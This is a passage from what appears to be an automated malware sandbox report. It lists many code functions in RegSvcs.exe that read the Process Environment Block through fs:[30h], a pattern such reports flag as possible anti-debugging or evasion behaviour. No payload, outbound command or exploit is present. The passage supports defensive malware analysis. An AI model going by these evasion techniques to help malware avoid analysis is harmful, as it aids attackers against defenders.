                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0136E3F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0136E3F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013863FF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F43D4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F43D4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013D63C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0134823B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01354260 mov eax, dword ptr fs:[00000030h]4_2_01354260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01354260 mov eax, dword ptr fs:[00000030h]4_2_01354260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01354260 mov eax, dword ptr fs:[00000030h]4_2_01354260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134826B mov eax, dword ptr fs:[00000030h]4_2_0134826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134A250 mov eax, dword ptr fs:[00000030h]4_2_0134A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01356259 mov eax, dword ptr fs:[00000030h]4_2_01356259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D8243 mov eax, dword ptr fs:[00000030h]4_2_013D8243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D8243 mov ecx, dword ptr fs:[00000030h]4_2_013D8243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013602A0 mov eax, dword ptr fs:[00000030h]4_2_013602A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013602A0 mov eax, dword ptr fs:[00000030h]4_2_013602A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E62A0 mov ecx, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E284 mov eax, dword ptr fs:[00000030h]4_2_0138E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E284 mov eax, dword ptr fs:[00000030h]4_2_0138E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]4_2_013D0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]4_2_013D0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]4_2_013D0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]4_2_013602E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]4_2_013602E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]4_2_013602E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E6500 mov eax, dword ptr fs:[00000030h]4_2_013E6500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]4_2_0138656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]4_2_0138656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]4_2_0138656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358550 mov eax, dword ptr fs:[00000030h]4_2_01358550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358550 mov eax, dword ptr fs:[00000030h]4_2_01358550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013745B1 mov eax, dword ptr fs:[00000030h]4_2_013745B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013745B1 mov eax, dword ptr fs:[00000030h]4_2_013745B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]4_2_013D05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]4_2_013D05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]4_2_013D05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E59C mov eax, dword ptr fs:[00000030h]4_2_0138E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01384588 mov eax, dword ptr fs:[00000030h]4_2_01384588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01352582 mov eax, dword ptr fs:[00000030h]4_2_01352582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01352582 mov ecx, dword ptr fs:[00000030h]4_2_01352582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013525E0 mov eax, dword ptr fs:[00000030h]4_2_013525E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138C5ED mov eax, dword ptr fs:[00000030h]4_2_0138C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138C5ED mov eax, dword ptr fs:[00000030h]4_2_0138C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013565D0 mov eax, dword ptr fs:[00000030h]4_2_013565D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A5D0 mov eax, dword ptr fs:[00000030h]4_2_0138A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A5D0 mov eax, dword ptr fs:[00000030h]4_2_0138A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E5CF mov eax, dword ptr fs:[00000030h]4_2_0138E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E5CF mov eax, dword ptr fs:[00000030h]4_2_0138E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A430 mov eax, dword ptr fs:[00000030h]4_2_0138A430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134C427 mov eax, dword ptr fs:[00000030h]4_2_0134C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]4_2_0134E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]4_2_0134E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]4_2_0134E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]4_2_01388402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]4_2_01388402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]4_2_01388402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]4_2_0137A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]4_2_0137A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]4_2_0137A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DC460 mov ecx, dword ptr fs:[00000030h]4_2_013DC460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134645D mov eax, dword ptr fs:[00000030h]4_2_0134645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137245A mov eax, dword ptr fs:[00000030h]4_2_0137245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013844B0 mov ecx, dword ptr fs:[00000030h]4_2_013844B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DA4B0 mov eax, dword ptr fs:[00000030h]4_2_013DA4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013564AB mov eax, dword ptr fs:[00000030h]4_2_013564AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013504E5 mov ecx, dword ptr fs:[00000030h]4_2_013504E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138273C mov eax, dword ptr fs:[00000030h]4_2_0138273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138273C mov ecx, dword ptr fs:[00000030h]4_2_0138273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138273C mov eax, dword ptr fs:[00000030h]4_2_0138273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CC730 mov eax, dword ptr fs:[00000030h]4_2_013CC730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138C720 mov eax, dword ptr fs:[00000030h]4_2_0138C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138C720 mov eax, dword ptr fs:[00000030h]4_2_0138C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01350710 mov eax, dword ptr fs:[00000030h]4_2_01350710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01380710 mov eax, dword ptr fs:[00000030h]4_2_01380710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138C700 mov eax, dword ptr fs:[00000030h]4_2_0138C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358770 mov eax, dword ptr fs:[00000030h]4_2_01358770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DE75D mov eax, dword ptr fs:[00000030h]4_2_013DE75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01350750 mov eax, dword ptr fs:[00000030h]4_2_01350750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D4755 mov eax, dword ptr fs:[00000030h]4_2_013D4755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392750 mov eax, dword ptr fs:[00000030h]4_2_01392750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01392750 mov eax, dword ptr fs:[00000030h]4_2_01392750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138674D mov esi, dword ptr fs:[00000030h]4_2_0138674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138674D mov eax, dword ptr fs:[00000030h]4_2_0138674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138674D mov eax, dword ptr fs:[00000030h]4_2_0138674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013507AF mov eax, dword ptr fs:[00000030h]4_2_013507AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F678E mov eax, dword ptr fs:[00000030h]4_2_013F678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013547FB mov eax, dword ptr fs:[00000030h]4_2_013547FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013547FB mov eax, dword ptr fs:[00000030h]4_2_013547FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]4_2_013727ED
